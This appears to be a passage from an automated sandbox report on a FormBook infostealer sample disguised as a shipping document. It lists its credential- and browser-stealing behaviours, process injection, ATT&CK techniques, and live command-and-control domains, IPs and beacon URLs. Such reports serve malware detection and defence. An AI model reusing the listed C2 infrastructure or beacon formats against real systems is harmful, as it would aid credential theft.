                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: DRAFT COPY BL, CI & PL.exeBinary or memory string: WIN_81
                Source: DRAFT COPY BL, CI & PL.exeBinary or memory string: WIN_XP
                Source: DRAFT COPY BL, CI & PL.exeBinary or memory string: WIN_XPe
                Source: DRAFT COPY BL, CI & PL.exeBinary or memory string: WIN_VISTA
                Source: DRAFT COPY BL, CI & PL.exeBinary or memory string: WIN_7
                Source: DRAFT COPY BL, CI & PL.exeBinary or memory string: WIN_8
                Source: DRAFT COPY BL, CI & PL.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3520159967.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3520891709.0000000001320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3521394310.00000000042D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221510574.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221951172.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520903347.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221199653.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3520852127.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_009A6283
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_009A6747

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		5
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		5
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571295 Sample: DRAFT COPY BL, CI & PL.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 31 www.prestigerugz.info 2->31 33 www.ontherise.top 2->33 35 12 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Antivirus detection for URL or domain 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 5 other signatures 2->45 10 DRAFT COPY BL, CI & PL.exe 2 2->10         started        signatures3 process4 signatures5 55 Binary is likely a compiled AutoIt script file 10->55 57 Writes to foreign memory regions 10->57 59 Maps a DLL or memory area into another process 10->59 13 svchost.exe 10->13         started        process6 signatures7 61 Maps a DLL or memory area into another process 13->61 16 oFlOzErifOVgUf.exe 13->16 injected process8 dnsIp9 25 taxitayninh365.site 103.75.185.22, 49997, 50006, 50012 VNBOOKING-AS-VNVietNamBookingcorporationVN Viet Nam 16->25 27 www.prestigerugz.info 217.160.0.113, 49797, 49804, 49811 ONEANDONE-ASBrauerstrasse48DE Germany 16->27 29 5 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 tzutil.exe 13 16->20         started        signatures10 process11 signatures12 47 Tries to steal Mail credentials (via file / registry access) 20->47 49 Tries to harvest and steal browser information (history, passwords, etc) 20->49 51 Modifies the context of a thread in another process (thread injection) 20->51 53 2 other signatures 20->53 23 firefox.exe 20->23         started        process13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                DRAFT COPY BL, CI & PL.exe45%ReversingLabsWin32.Trojan.AutoitInject
                DRAFT COPY BL, CI & PL.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.44ynh.top/l9wb/100%Avira URL Cloudmalware
                http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
                http://www.ontherise.top0%Avira URL Cloudsafe
                http://www.75178.club/q34f/0%Avira URL Cloudsafe
                http://www.prestigerugz.info/m5si/0%Avira URL Cloudsafe
                http://www.supernutra01.online/q3v1/?_PMl3=z6VH1Hp8JH&X25tIdT0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs=0%Avira URL Cloudsafe
                http://www.jijievo.site/521z/?X25tIdT0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&_PMl3=z6VH1Hp8JH0%Avira URL Cloudsafe
                http://www.ontherise.top/wr6c/0%Avira URL Cloudsafe
                http://www.75178.club/q34f/?X25tIdT0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=&_PMl3=z6VH1Hp8JH0%Avira URL Cloudsafe
                http://www.44ynh.top/l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JH100%Avira URL Cloudmalware
                http://www.prestigerugz.info/m5si/?X25tIdT0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&_PMl3=z6VH1Hp8JH0%Avira URL Cloudsafe
                http://www.taxitayninh365.site/syud/0%Avira URL Cloudsafe
                http://www.jijievo.site/521z/0%Avira URL Cloudsafe
                http://www.taxitayninh365.site/syud/?X25tIdT0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&_PMl3=z6VH1Hp8JH0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                44ynh.top
                		38.181.21.178
                		truetrue
                  		unknown
                  all.wjscdn.com
                  		154.90.58.209
                  		truetrue
                    		unknown
                    www.prestigerugz.info
                    		217.160.0.113
                    		truetrue
                      		unknown
                      www.supernutra01.online
                      		172.67.220.36
                      		truefalse
                        		high
                        taxitayninh365.site
                        		103.75.185.22
                        		truetrue
                          		unknown
                          www.ontherise.top
                          		162.0.213.94
                          		truetrue
                            		unknown
                            gtml.huksa.huhusddfnsuegcdn.com
                            		23.167.152.41
                            		truefalse
                              		high
                              www.75178.club
                              		unknown
                              		unknownfalse
                                		unknown
                                www.setwayidiomas.online
                                		unknown
                                		unknownfalse
                                  		unknown
                                  www.jijievo.site
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.buckser.info
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.44ynh.top
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.taxitayninh365.site
                                        		unknown
                                        		unknownfalse
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.supernutra01.online/q3v1/?_PMl3=z6VH1Hp8JH&X25tIdT0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs=false
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.prestigerugz.info/m5si/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.44ynh.top/l9wb/true
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.75178.club/q34f/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jijievo.site/521z/?X25tIdT0=Yx3A360WU89Z0GGJ4sj1ssKBmwUq+j2s/KQE4E7BbN1HAmIot3HipiLJPY42zmsSwDZ5HnrJyLyqyKfyPPN/Ul94K97G9BNerQ7FJbOxJndggPtqh59eHiM=&_PMl3=z6VH1Hp8JHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.44ynh.top/l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JHtrue
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.75178.club/q34f/?X25tIdT0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=&_PMl3=z6VH1Hp8JHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.ontherise.top/wr6c/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.prestigerugz.info/m5si/?X25tIdT0=eqY3hh7t27bJ5LQfUACiIBop+4++C12UJ8jqVv8fYDW4JFKoOjNM9tGFtSdYH3IXt9v4kCCdG8KeR7OcjMcnk3D3+1Po89+p2utRtVEn8mZesTWlz/QNOcc=&_PMl3=z6VH1Hp8JHtrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jijievo.site/521z/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.taxitayninh365.site/syud/true
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.taxitayninh365.site/syud/?X25tIdT0=gwko4eFZldhJcfMqOkuan3QkmOfQdTdfj6+zOL8mAR+JwCfgYxN4oPNpnnwcuB8vQ1y33dVzUTzhe1i/ZlYVLB7aoFOkRW7okE41Q20TXo8AOTZtTl9M9bg=&_PMl3=z6VH1Hp8JHtrue
                                          • Avira URL Cloud: safe
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://ac.ecosia.org/autocomplete?q=tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/chrome_newtabtzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icotzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://kb.fastpanel.direct/troubleshoot/oFlOzErifOVgUf.exe, 00000005.00000002.3522703492.0000000004B94000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3522886189.0000000006900000.00000004.00000800.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000004344000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2517818127.000000003C874000.00000004.80000000.00040000.00000000.sdmpfalse
                                                    		high
                                                    http://www.litespeedtech.com/error-pageoFlOzErifOVgUf.exe, 00000005.00000002.3522703492.0000000005692000.00000004.80000000.00040000.00000000.sdmp, tzutil.exe, 00000006.00000002.3521520446.0000000004E42000.00000004.10000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.ontherise.topoFlOzErifOVgUf.exe, 00000005.00000002.3520891709.0000000001374000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.ecosia.org/newtab/tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tzutil.exe, 00000006.00000003.2409972821.000000000834D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              162.0.213.94
                                                              		www.ontherise.topCanada
                                                              		35893ACPCAtrue
                                                              217.160.0.113
                                                              		www.prestigerugz.infoGermany
                                                              		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                              23.167.152.41
                                                              		gtml.huksa.huhusddfnsuegcdn.comReserved
                                                              		395774ESVC-ASNUSfalse
                                                              103.75.185.22
                                                              		taxitayninh365.siteViet Nam
                                                              		63762VNBOOKING-AS-VNVietNamBookingcorporationVNtrue
                                                              172.67.220.36
                                                              		www.supernutra01.onlineUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              154.90.58.209
                                                              		all.wjscdn.comSeychelles
                                                              		40065CNSERVERSUStrue
                                                              38.181.21.178
                                                              		44ynh.topUnited States
                                                              		174COGENT-174UStrue

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1571295
                                                              Start date and time:2024-12-09 09:08:45 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 9m 31s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Run name:Run with higher sleep bypass
                                                              Number of analysed new started processes analysed:8
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:1
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:DRAFT COPY BL, CI & PL.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@13/7
                                                              EGA Information:
                                                              • Successful, ratio: 100%
                                                              HCA Information:
                                                              • Successful, ratio: 97%
                                                              • Number of executed functions: 51
                                                              • Number of non-executed functions: 275
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: DRAFT COPY BL, CI & PL.exe

                                                              Simulations

                                                              Behavior and APIs

                                                              No simulations

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              162.0.213.94New Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.inspireto.life/odi0/
                                                              Price Inquiry.exeGet hashmaliciousFormBookBrowse
                                                              • www.oxilo.info/ve3g/
                                                              3qsTcL9MOT.exeGet hashmaliciousFormBookBrowse
                                                              • www.oxilo.info/ve3g/
                                                              PO #86637.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.kryto.top/09dt/
                                                              invoice.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              r9856_7.exeGet hashmaliciousFormBookBrowse
                                                              • www.zimra.xyz/knrh/
                                                              PO#86637.exeGet hashmaliciousFormBookBrowse
                                                              • www.syvra.xyz/h2bb/
                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.kryto.top/09dt/?lt=rbfG5gS9WKSJFi6dUtliAmup1VBkpZqBcQUpaxDzzhML0bBwD+Qj3UGhdh/xQ289mI9ftdcjEJi/URIx5SNFZ5ISx4hWtAA8ETmF0fwXx3j+/89J/je5YeA=&3ry=nj20Xr
                                                              Scan 00093847.exeGet hashmaliciousFormBookBrowse
                                                              • www.kryto.top/09dt/
                                                              217.160.0.113Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • www.prestigerugz.info/m5si/
                                                              r98100.TREN.AUTpdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                              • www.lessstressmoreprogress.net/mr04/?Z0D0=rvjNexh3zvI53VZUK60PjrTIX1CVATH5ZgWwVgY6EkaNyaLT3yhdToUFTRj6RAPXbKk9&Xv9xe4=R6Ax
                                                              Purchase_Order.exeGet hashmaliciousFormBookBrowse
                                                              • www.le-riche.fr/i65a/?l6APbZn0=+0bkTaWhYWAVxnCJ2nwVpM/U/2VALoigtFbvSxMYohoxF0aNNQstvpt3f/wi09R94V0cyMZY94rCxAyEavJUVbQqc8cScfvcKQ==&VVcXv=Fzud9r2H_Lzd_B
                                                              Updrag.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • www.le-riche.fr/niku/?7nFlllx=xrumqyiZw2NMGXSTF9hjIkLrOU6nhVxQiFFKzEKgJBV7+VOp5xdEyxF9LjnfDDCimwOB7aDhAwI/GQ5vlF1HZu55hCcgrcQOFQ==&u4=UvZXQxCPphTT6J
                                                              Vldigst.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • www.le-riche.fr/niku/?mPwH=_XpHEd8884gT7RZp&4hiT=xrumqyiZw2NMGXSTF9hjIkLrOU6nhVxQiFFKzEKgJBV7+VOp5xdEyxF9LjnfDDCimwOB7aDhAwI/GQ5vlF1HZu55hCcgrcQOFQ==
                                                              t.exeGet hashmaliciousFormBookBrowse
                                                              • www.le-riche.fr/niku/?xH=WHAh6h1XT&NPUh=xrumqyiZw2NMGXSTXZhmP1v4YE2H3hdQiFFKzEKgJBV7+VOp5xdEyw59LjnfDDCimwOB7aDhAwI/GQ5vlF18Zvll9TNcqcdgEQ==
                                                              23.167.152.41A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • www.75178.club/a4h7/
                                                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • www.75178.club/q34f/
                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • www.75178.club/a4h7/

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              www.supernutra01.onlinePO_1111101161.vbsGet hashmaliciousFormBookBrowse
                                                              • 104.21.24.198
                                                              PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                              • 104.21.24.198
                                                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • 104.21.24.198
                                                              DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                              • 104.21.24.198
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.220.36
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.220.36
                                                              Project Breakdown Doc.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.220.36
                                                              DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                              • 172.67.220.36
                                                              gtml.huksa.huhusddfnsuegcdn.comlgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              New quotation request.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              HUEtVS3MQe.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              need quotations.exeGet hashmaliciousFormBookBrowse
                                                              • 23.167.152.41
                                                              rGO880-PDF.exeGet hashmaliciousFormBookBrowse
                                                              • 206.119.185.138
                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                              • 206.119.185.141
                                                              www.prestigerugz.infoPayment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • 217.160.0.113
                                                              all.wjscdn.comNew Order.exeGet hashmaliciousFormBookBrowse
                                                              • 154.90.35.240
                                                              TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                              • 38.54.112.227
                                                              Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                              • 154.205.159.116
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 38.54.112.227
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 154.90.58.209

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              ONEANDONE-ASBrauerstrasse48DENEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                              • 217.160.0.200
                                                              atthings.docGet hashmaliciousRemcosBrowse
                                                              • 87.106.161.219
                                                              mpsl.elfGet hashmaliciousUnknownBrowse
                                                              • 217.160.35.205
                                                              purchase order.exeGet hashmaliciousFormBookBrowse
                                                              • 74.208.236.156
                                                              MGQeZjDXc3.exeGet hashmaliciousFormBookBrowse
                                                              • 217.160.0.207
                                                              s7Okni1gfE.exeGet hashmaliciousFormBookBrowse
                                                              • 217.160.0.207
                                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 74.208.53.196
                                                              FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                              • 217.160.114.212
                                                              FR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                                                              • 217.160.114.212
                                                              togiveme.docGet hashmaliciousRemcosBrowse
                                                              • 217.160.114.212
                                                              VNBOOKING-AS-VNVietNamBookingcorporationVNquotation.exeGet hashmaliciousFormBookBrowse
                                                              • 103.75.185.22
                                                              specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                              • 103.75.185.22
                                                              ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                              • 103.75.185.22
                                                              DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                              • 103.75.187.24
                                                              SecuriteInfo.com.Trojan.DownLoader47.2167.1345.13365.exeGet hashmaliciousUnknownBrowse
                                                              • 103.75.184.19
                                                              SecuriteInfo.com.Trojan.DownLoader47.2167.1345.13365.exeGet hashmaliciousUnknownBrowse
                                                              • 103.75.184.19
                                                              https://bloxe.vn/za.htmlGet hashmaliciousUnknownBrowse
                                                              • 103.75.187.17
                                                              Cari_Hesap_Ekstresi_100923.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                              • 103.75.184.21
                                                              Sipari#U015f_5035.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                              • 103.75.184.21
                                                              https://thienquy.vn/app-personal-mobile/mua/USER/scis/j6UnVHZsitlYrxStPNFUN4TsSjgEJkN7dlDp6FXSjFxO/3D/no-back-button/Get hashmaliciousUnknownBrowse
                                                              • 103.75.184.25
                                                              ACPCAMN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.215.33
                                                              jew.mips.elfGet hashmaliciousUnknownBrowse
                                                              • 162.52.78.93
                                                              home.ppc.elfGet hashmaliciousMiraiBrowse
                                                              • 162.54.91.8
                                                              i686.elfGet hashmaliciousUnknownBrowse
                                                              • 162.54.34.238
                                                              main_mpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 162.65.245.139
                                                              sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                              • 162.55.63.205
                                                              teste.x86_64.elfGet hashmaliciousGafgyt, Mirai, Moobot, OkiruBrowse
                                                              • 162.128.62.120
                                                              m68k.elfGet hashmaliciousMiraiBrowse
                                                              • 162.137.25.111
